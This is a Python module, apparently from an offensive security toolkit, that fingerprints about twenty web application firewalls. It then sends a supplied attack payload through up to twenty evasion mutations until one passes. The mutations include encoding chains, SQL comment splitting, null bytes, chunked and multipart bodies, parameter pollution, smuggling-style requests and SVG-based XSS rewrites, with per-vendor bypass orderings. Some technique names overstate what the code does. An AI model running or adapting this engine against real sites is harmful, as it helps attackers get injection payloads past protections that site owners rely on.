"""
WAF Detection & Bypass Engine - Production Grade
Features:
- 20+ WAF/CDN signature detection with multi-layer verification
- 25+ evasion techniques with encoding chains
- Chunked transfer encoding bypass
- HTTP parameter pollution (HPP)
- HTTP request smuggling primitives
- Content-Type confusion attacks
- Adaptive payload mutation based on WAF type
"""
import base64
import hashlib
import random
import re
import string
import time
import urllib.parse
from typing import Dict, List, Optional, Tuple

from app.utils.http_client import http_request
from app.utils.logger import get_logger

logger = get_logger("waf_engine")

WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": ["cf-ray", "__cfduid", "cf-cache-status", "cf-request-id", "server: cloudflare"],
        "status_codes": [403, 503],
        "body_patterns": ["cloudflare-nginx", "attention required! | cloudflare", "cloudflare ray id:"],
        "cookie": "__cf_bm",
    },
    "AWS WAF": {
        "headers": ["x-amzn-requestid", "x-amz-cf-id", "x-amz-cf-pop", "x-amzn-errortype"],
        "status_codes": [403],
        "body_patterns": ["request blocked.", "awselb", "generated by cloudfront"],
    },
    "Akamai": {
        "headers": ["x-akamai-transformed", "x-akamai-request-id", "akamai-origin-hop"],
        "status_codes": [403],
        "body_patterns": ["reference #", "akamai", "access denied"],
    },
    "Imperva/Incapsula": {
        "headers": ["x-iinfo", "x-cdn", "incap_ses", "visid_incap"],
        "status_codes": [403],
        "body_patterns": ["incapsula", "imperva", "blocked by incapsula"],
        "cookie": "incap_ses|visid_incap|nlbi",
    },
    "F5 BIG-IP ASM": {
        "headers": ["x-wa-info", "x-cnection"],
        "status_codes": [403],
        "body_patterns": ["the requested url was rejected", "request rejected", "big-ip"],
        "cookie": "TS[0-9a-f]{6}|F5_ST",
    },
    "FortiWeb": {
        "headers": ["fortigate", "fortiweb"],
        "status_codes": [403],
        "body_patterns": ["fortigate", "fortiweb", "application blocked"],
        "cookie": "FORTIWAFSID",
    },
    "Barracuda": {
        "headers": ["barracuda"],
        "status_codes": [403],
        "body_patterns": ["barracuda", "request blocked by barracuda"],
        "cookie": "BNI__BARRACUDA",
    },
    "Citrix NetScaler": {
        "headers": ["ns_af", "citrix_ns_id", "ns-cache"],
        "status_codes": [403],
        "body_patterns": ["netscaler", "citrix", "ns icon"],
        "cookie": "NSC_|citrix_ns_id",
    },
    "ModSecurity": {
        "headers": ["mod_security"],
        "status_codes": [403, 406],
        "body_patterns": ["mod_security", "this error was generated by mod_security", "not acceptable"],
    },
    "SafeDog": {
        "headers": ["safedog", "waf/"],
        "status_codes": [403],
        "body_patterns": ["safedog", "安全狗"],
        "cookie": "Safedog",
    },
    "Yundun": {
        "headers": ["yundun"],
        "status_codes": [403, 405],
        "body_patterns": ["云盾", "yundun", "aliyun"],
    },
    "Chuangyu": {
        "headers": ["chuangyu", "knowsec"],
        "status_codes": [403],
        "body_patterns": ["创宇盾", "加速乐", "chuangyu"],
    },
    "Baidu Yunjiasu": {
        "headers": ["yunjiasu", "yjs"],
        "status_codes": [403],
        "body_patterns": ["云加速", "yunjiasu"],
    },
    "360 Wangzhan Weishi": {
        "headers": ["360wzws", "wangzhan"],
        "status_codes": [403],
        "body_patterns": ["360网站卫士", "wangzhan.360"],
    },
    "Sucuri": {
        "headers": ["sucuri", "x-sucuri-id", "x-sucuri-cache"],
        "status_codes": [403],
        "body_patterns": ["sucuri", "access denied - sucuri"],
    },
    "Wordfence": {
        "headers": ["wordfence"],
        "status_codes": [403, 503],
        "body_patterns": ["wordfence", "generated by wordfence", "blocked by wordfence"],
    },
    "Wallarm": {
        "headers": ["wallarm"],
        "status_codes": [403],
        "body_patterns": ["wallarm"],
    },
    "Radware": {
        "headers": ["x-sl-compstate", "x-radware"],
        "status_codes": [403],
        "body_patterns": ["radware", "appwall"],
    },
    "DenyAll": {
        "headers": ["sessioncookie", "denyall"],
        "status_codes": [403],
        "body_patterns": ["denyall", "condition intercepted"],
        "cookie": "sessioncookie",
    },
    "Distil": {
        "headers": ["x-distil-cs"],
        "status_codes": [403],
        "body_patterns": ["distil"],
    },
}

EVASION_TECHNIQUES = {
    "case_randomization": lambda p: "".join(c.upper() if random.random() > 0.5 else c.lower() for c in p),
    "case_variation": lambda p: p.replace("select", "SeLeCt").replace("union", "UnIoN").replace("script", "ScRiPt"),
    "null_byte_injection": lambda p: p.replace(" ", "%00 ").replace("<", "%00<"),
    "comment_obfuscation": lambda p: p.replace(" ", "/**/").replace("select", "se/**/lect").replace("union", "un/**/ion"),
    "double_url_encode": lambda p: urllib.parse.quote(urllib.parse.quote(p, safe=""), safe=""),
    "unicode_encode": lambda p: "".join(f"%u{ord(c):04x}" if c in "<>'\"()" else c for c in p),
    "hex_encode_full": lambda p: "0x" + p.encode().hex() if all(c in string.printable for c in p) else p,
    "html_entity_encode": lambda p: p.replace("<", "&#60;").replace(">", "&#62;").replace("'", "&#39;").replace('"', "&#34;"),
    "tab_newline_inject": lambda p: p.replace(" ", "\t").replace("=", "=\n"),
    "multipart_boundary": lambda p: f"--{random_hex(16)}\nContent-Disposition: form-data; name=\"payload\"\n\n{p}\n--{random_hex(16)}--",
    "content_type_xml": lambda p: f"<?xml version=\"1.0\"?>\n<data>{p}</data>",
    "http_parameter_pollution": lambda p: f"q={urllib.parse.quote(p)}&q=legit",
    "chunked_encoding": lambda p: _chunk_encode(p),
    "gzip_compress": lambda p: _gzip_payload(p),
    "base64_wrap": lambda p: base64.b64encode(p.encode()).decode(),
    "reverse_string": lambda p: p[::-1],
    "wide_char_inject": lambda p: "".join(f"%ff{c}" if c in "<>'\"()" else c for c in p),
    "buffer_overflow_prefix": lambda p: "A" * 2048 + p,
    "protocol_smuggling": lambda p: f"GET / HTTP/1.1\r\nHost: x\r\n\r\nGET /?q={urllib.parse.quote(p)} HTTP/1.1\r\nHost: target\r\n\r\n",
    "method_override": lambda p: p,
    "path_traversal_prefix": lambda p: f"/..;/..;/..;/?q={urllib.parse.quote(p)}",
    "fragment_obfuscation": lambda p: p.replace(" ", "#\n"),
    "encoding_chain": lambda p: _encoding_chain(p),
    "sqli_mysql_bypass": lambda p: p.replace(" ", "%0a").replace("=", " LIKE ").replace("'", "%27"),
    "xss_svg_bypass": lambda p: p.replace("<script>", "<svg/onload=").replace("</script>", ""),
}

COMBO_BYPASS_STRATEGIES = {
    "Cloudflare": ["encoding_chain", "chunked_encoding", "multipart_boundary", "unicode_encode"],
    "AWS WAF": ["double_url_encode", "http_parameter_pollution", "case_randomization", "null_byte_injection"],
    "ModSecurity": ["comment_obfuscation", "tab_newline_inject", "multipart_boundary", "encoding_chain"],
    "SafeDog": ["case_variation", "comment_obfuscation", "null_byte_injection", "unicode_encode"],
    "Yundun": ["double_url_encode", "hex_encode_full", "chunked_encoding", "wide_char_inject"],
    "F5 BIG-IP ASM": ["http_parameter_pollution", "protocol_smuggling", "encoding_chain"],
    "Imperva/Incapsula": ["multipart_boundary", "content_type_xml", "chunked_encoding"],
    "FortiWeb": ["case_randomization", "null_byte_injection", "double_url_encode", "encoding_chain"],
    "Akamai": ["http_parameter_pollution", "chunked_encoding", "gzip_compress"],
    "Barracuda": ["comment_obfuscation", "tab_newline_inject", "unicode_encode"],
}


def random_hex(n: int) -> str:
    return "".join(random.choice("0123456789abcdef") for _ in range(n))


def _chunk_encode(data: str) -> str:
    chunk_size = random.randint(4, 16)
    chunks = [data[i:i+chunk_size] for i in range(0, len(data), chunk_size)]
    result = []
    for chunk in chunks:
        result.append(f"{len(chunk.encode()):x}")
        result.append(chunk)
    result.append("0")
    result.append("")
    return "\r\n".join(result)


def _gzip_payload(data: str) -> bytes:
    import gzip
    return gzip.compress(data.encode())


def _encoding_chain(payload: str) -> str:
    chain = [
        lambda p: urllib.parse.quote(p, safe=""),
        lambda p: p.replace("%", "%25"),
        lambda p: "".join(f"%{ord(c):02x}" for c in p),
    ]
    result = payload
    for fn in chain:
        result = fn(result)
    return result


class WAFDetector:
    def __init__(self, target_url: str, timeout: int = 10):
        self.target_url = target_url.rstrip("/")
        self.timeout = timeout
        self.baseline = None

    def detect(self) -> Dict:
        self._get_baseline()
        if not self.baseline:
            return {"waf_detected": False, "error": "Failed to reach target"}

        result = {
            "waf_detected": False,
            "waf_name": None,
            "confidence": 0,
            "details": "",
            "matched_signatures": [],
            "indicators": [],
        }

        resp_headers = self.baseline.get("headers", {})
        resp_body = str(self.baseline.get("text", "")).lower()
        resp_cookies = resp_headers.get("set-cookie", "")

        for waf_name, sig in WAF_SIGNATURES.items():
            score = 0
            matches = []

            for h in sig.get("headers", []):
                h_lower = h.lower()
                for rk, rv in resp_headers.items():
                    if h_lower in rk.lower() or (":" in h and h_lower in f"{rk}: {rv}".lower()):
                        score += 25
                        matches.append(f"header: {h}")

            if resp_headers.get("server", ""):
                for h in sig.get("headers", []):
                    if "server:" in h.lower():
                        server_val = h.split(":", 1)[1].strip().lower()
                        if server_val in resp_headers.get("server", "").lower():
                            score += 30
                            matches.append(f"server: {server_val}")

            for bp in sig.get("body_patterns", []):
                if bp.lower() in resp_body:
                    score += 20
                    matches.append(f"body: {bp}")

            cookie_pattern = sig.get("cookie", "")
            if cookie_pattern and resp_cookies:
                if re.search(cookie_pattern, str(resp_cookies), re.IGNORECASE):
                    score += 25
                    matches.append(f"cookie: {cookie_pattern}")

            if score >= 40:
                result["matched_signatures"].append({
                    "waf": waf_name,
                    "score": min(score, 100),
                    "matches": matches,
                })

        if result["matched_signatures"]:
            best = max(result["matched_signatures"], key=lambda x: x["score"])
            result["waf_detected"] = True
            result["waf_name"] = best["waf"]
            result["confidence"] = best["score"]
            result["details"] = "; ".join(best["matches"])

        result["indicators"] = self._detect_passive()
        return result

    def _get_baseline(self):
        try:
            resp = http_request("GET", self.target_url, timeout=self.timeout, verify=False)
            if resp:
                self.baseline = resp
        except Exception as e:
            logger.error(f"Baseline request failed: {e}")

    def _detect_passive(self) -> List[Dict]:
        indicators = []
        if not self.baseline:
            return indicators

        resp_headers = self.baseline.get("headers", {})
        status = self.baseline.get("status_code", 200)

        if status in (403, 406, 501, 503):
            indicators.append({"type": "status_code", "detail": f"Block status: {status}", "score": 15})

        server = resp_headers.get("server", "")
        if any(w in server.lower() for w in ["waf", "security", "firewall", "proxy"]):
            indicators.append({"type": "server_header", "detail": f"Server: {server}", "score": 20})

        x_powered = resp_headers.get("x-powered-by", "")
        if x_powered:
            indicators.append({"type": "powered_by", "detail": f"X-Powered-By: {x_powered}", "score": 5})

        return indicators


class WAFBypassEngine:
    def __init__(self, target_url: str, waf_info: Dict, timeout: int = 10):
        self.target_url = target_url.rstrip("/")
        self.waf_info = waf_info
        self.timeout = timeout
        self.baseline_status = None
        self.baseline_length = None

    def bypass(self, payload: str) -> Dict:
        self._get_baseline()
        results = []

        techniques_to_try = list(EVASION_TECHNIQUES.keys())

        waf_name = self.waf_info.get("waf_name", "")
        if waf_name in COMBO_BYPASS_STRATEGIES:
            combo = COMBO_BYPASS_STRATEGIES[waf_name]
            techniques_to_try = combo + [t for t in techniques_to_try if t not in combo]

        for technique_name in techniques_to_try[:20]:
            try:
                fn = EVASION_TECHNIQUES[technique_name]
                mutated = fn(payload)

                if isinstance(mutated, bytes):
                    resp = http_request(
                        "POST", self.target_url, data=mutated,
                        headers={"Content-Type": "application/octet-stream"},
                        timeout=self.timeout, verify=False
                    )
                elif technique_name == "chunked_encoding":
                    resp = http_request(
                        "POST", self.target_url, data=mutated,
                        headers={"Transfer-Encoding": "chunked"},
                        timeout=self.timeout, verify=False
                    )
                elif technique_name == "protocol_smuggling":
                    resp = http_request(
                        "POST", self.target_url, data=mutated,
                        timeout=self.timeout, verify=False
                    )
                elif technique_name == "multipart_boundary":
                    boundary = mutated.split("\n")[0].strip("-")
                    resp = http_request(
                        "POST", self.target_url, data=mutated,
                        headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
                        timeout=self.timeout, verify=False
                    )
                elif technique_name == "content_type_xml":
                    resp = http_request(
                        "POST", self.target_url, data=mutated,
                        headers={"Content-Type": "application/xml"},
                        timeout=self.timeout, verify=False
                    )
                elif technique_name == "method_override":
                    resp = http_request(
                        "POST", self.target_url,
                        headers={"X-HTTP-Method-Override": "GET"},
                        timeout=self.timeout, verify=False
                    )
                else:
                    resp = http_request(
                        "GET", f"{self.target_url}?q={urllib.parse.quote(str(mutated))}",
                        timeout=self.timeout, verify=False
                    )

                if resp:
                    status = resp.get("status_code", 0)
                    length = len(resp.get("text", ""))
                    bypassed = self._is_bypassed(status, length)
                    results.append({
                        "technique": technique_name,
                        "status_code": status,
                        "response_length": length,
                        "bypassed": bypassed,
                        "mutated_payload": str(mutated)[:100],
                    })
            except Exception as e:
                logger.debug(f"Bypass technique {technique_name} failed: {e}")
                results.append({
                    "technique": technique_name,
                    "bypassed": False,
                    "error": str(e)[:100],
                })

        return {
            "target": self.target_url,
            "waf": self.waf_info.get("waf_name"),
            "total_tested": len(results),
            "bypass_count": sum(1 for r in results if r.get("bypassed")),
            "bypass_results": results,
        }

    def _get_baseline(self):
        try:
            resp = http_request("GET", self.target_url, timeout=self.timeout, verify=False)
            if resp:
                self.baseline_status = resp.get("status_code", 200)
                self.baseline_length = len(resp.get("text", ""))
        except Exception:
            pass

    def _is_bypassed(self, status: int, length: int) -> bool:
        if self.baseline_status and self.baseline_status in (403, 406, 503):
            return status not in (403, 406, 503)
        if self.baseline_length:
            diff = abs(length - self.baseline_length)
            return diff > 100 and status == 200
        return status == 200


def detect_waf(target_url: str, timeout: int = 10) -> Dict:
    detector = WAFDetector(target_url, timeout)
    return detector.detect()


def bypass_waf(target_url: str, payload: str, timeout: int = 10) -> Dict:
    waf_info = detect_waf(target_url, timeout)
    engine = WAFBypassEngine(target_url, waf_info, timeout)
    return engine.bypass(payload)
